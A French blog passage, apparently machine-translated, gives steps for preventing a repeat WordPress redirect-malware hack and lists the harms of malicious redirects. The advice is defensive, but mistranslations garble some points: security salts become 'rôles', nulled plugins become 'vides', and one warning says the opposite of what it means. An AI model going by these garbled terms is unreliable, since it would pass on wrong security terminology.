Les hacks sont répétés tout le temps. Cela est principalement dû au fait que la raison pour laquelle votre site a été piraté n'a pas été corrigée. Pour éviter une récidive, les étapes suivantes doivent être suivies :

1. Installer le plugin de sécurité: choisissez un bon plugin de sécurité capable d'analyser, de nettoyer et d'empêcher les piratages. Ces plugins ont un pare-feu intégré qui empêche de manière proactive le trafic nuisible d'atteindre votre site.
2. Modifier tous les mots de passe des utilisateurs et de la base de données: Les comptes d'utilisateurs compromis et les mots de passe faciles à deviner sont la deuxième raison des piratages de sites Web.
3. Réinitialiser et vérifier les comptes d'utilisateurs: vérifiez les comptes d'utilisateurs avec un accès administrateur inutile et supprimez-les.
4. Modifier les rôles + les clés de sécurité: les rôles et les clés de sécurité sont de longues chaînes que WordPress attache aux données de connexion des cookies pour aider les utilisateurs à rester connectés en toute sécurité. Vous pouvez les modifier dans votre fichier wp-config.php après avoir utilisé le générateur WordPress pour en obtenir de nouveaux.
5. Assurez-vous de n'utiliser que des plugins et des thèmes éprouvés: Je l'ai déjà dit, mais cela vaut la peine de le répéter. N'utilisez que des plugins et des thèmes de développeurs de confiance. Ces développeurs fourniront une assistance et des mises à jour extrêmement importantes pour la sécurité. Vous ne devez en aucun cas utiliser des thèmes et plugins vides. Quoi que vous économisiez, vous perdrez plusieurs fois en raison du piratage inévitable.
6. Assurez-vous d'avoir SSLR : Idéalement, vous devriez déjà avoir SSL sur votre site Web, mais nous l'incluons par souci d'exhaustivité. SSL garantit que la communication vers et depuis le site Web est cryptée. Google pousse également ce changement durement et vous commencerez bientôt à voir des pénalités SEO si vous ne l'avez pas déjà fait si SSL n'est pas activé sur votre site Web.
7. Protéger WordPress: Il existe des mesures de renforcement de la sécurité communément appelées durcissement de WordPress. Je tiens à vous avertir de ne pas oublier de suivre les bons conseils disponibles sur Internet. Certains d'entre eux ne fonctionnent absolument pas et affecteront votre site et l'expérience de vos visiteurs.
8. Avoir un plan de sécurité/des actions à faire régulièrement: il ne suffit pas de faire une seule chose et de l'oublier. À tout le moins, vérifiez régulièrement les utilisateurs et exigez des réinitialisations de mot de passe. La création d'un journal d'activité est également une bonne idée, car cela permet de suivre facilement et rapidement l'activité des utilisateurs, ce qui peut souvent être un signe avant-coureur d'un site piraté.
9. Vous devez également tout mettre à jour.R : WordPress, plugins et thèmes, et faites des sauvegardes régulières.

Quelles sont les conséquences des redirections malveillantes ?

Tout piratage a un effet terrible sur un site Web, et les logiciels malveillants de redirection WordPress ne sont pas différents. Voici quelques-unes des façons dont les logiciels malveillants peuvent avoir un impact négatif sur votre site Web et votre entreprise :

  • Perte de revenusi vous avez un site e-commerce ou un site d'entreprise.
  • Perte de valeur de la marque en raison de la redirection des visiteurs vers des sites illégaux, frauduleux ou spam.
  • Impact sur le référencementcar Google pénalise les sites piratés sur ses listes et signale un site piraté afin que les visiteurs aient généralement peur de le visiter.
  • Violation de données vos visiteurs et votre site.

Il existe de nombreuses autres façons dont le piratage peut causer des dommages matériels. Le facteur critique est d'agir rapidement et de se débarrasser des logiciels malveillants dès que possible.

Production

Le malware de piratage de redirection WordPress apparaît de temps en temps dans un nouvel avatar. Les pirates, et donc leurs logiciels malveillants, deviennent de plus en plus intelligents. Les sites Web WordPress sont un trésor pour eux et la seule façon de les battre est de prendre de l'avance sur leur jeu.

La meilleure façon de sécuriser votre site Web WordPress est d'installer un bon plugin de sécurité qui est également livré avec un pare-feu intégré. C'est sans aucun doute le meilleur investissement dans la sécurité de votre site Web.

Lire cet article :

Merci d'avoir lu : SEO HELPER | NICOLA.TOP

À quel point ce message vous a-t-il été utile ?

Cliquez sur une étoile pour la noter !

Note moyenne 5 / 5. Décompte des voix : 543

Aucun vote pour l'instant ! Soyez le premier à noter ce post.

Vous aimerez aussi...

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

onze − 3 =